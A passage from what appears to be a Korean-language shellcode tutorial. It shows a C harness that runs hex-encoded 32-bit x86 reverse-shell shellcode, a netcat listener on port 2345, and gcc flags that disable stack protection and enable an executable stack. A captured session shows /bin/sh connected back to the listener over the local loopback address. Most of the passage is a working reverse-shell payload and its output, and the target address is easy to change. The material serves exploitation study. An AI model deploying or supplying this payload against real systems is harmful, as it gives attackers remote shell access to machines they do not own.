...
| Code Block | ||||
|---|---|---|---|---|
| ||||
#include<stdio.h>
#include<string.h>
unsigned char shellcode [] = "\x6a\x66\x58\x99\x6a\x1\x5b\x52\x53\x6a\x2\x89\xe1\xcd\x80\x92\xb0\x66\x68\x7f\x1\x1\x1\x66\x68\x9\x29\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x87\xd3\x6a\x2\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\xb\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
unsigned char code[] = "";
void main()
{
int len = strlen(shellcode);
printf("Shellcode len : %d\n",len);
strcpy(code,shellcode);
(*(void(*)()) code)();
} |
- nc 프로그램을 이용해 클라이언트의 연결을 기다립니다.
| Code Block |
|---|
lazenca0x0@ubuntu:~$ nc -lvp 2345 Listening on [0.0.0.0] (family 0, port 2345) |
- reverse.c 를 빌드 후 실행합니다.
| Code Block |
|---|
lazenca0x0@ubuntu:~/Reverse$ gcc -o reverse -fno-stack-protector -z execstack --no-pie -m32 testreverse.c lazenca0x0@ubuntu:~/Reverse$ ./reverse Shellcode len : 78 |
- Shellcode에 의해 nc 프로그램에 "/bin/sh" 프로그램이 연결되었습니다.
| Code Block |
|---|
lazenca0x0@ubuntu:~$ nc -lvp 2345 Listening on [0.0.0.0] (family 0, port 2345) Connection from [127.0.0.1] port 2345 [tcp/*] accepted (family 2, sport 48860) id uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) |
...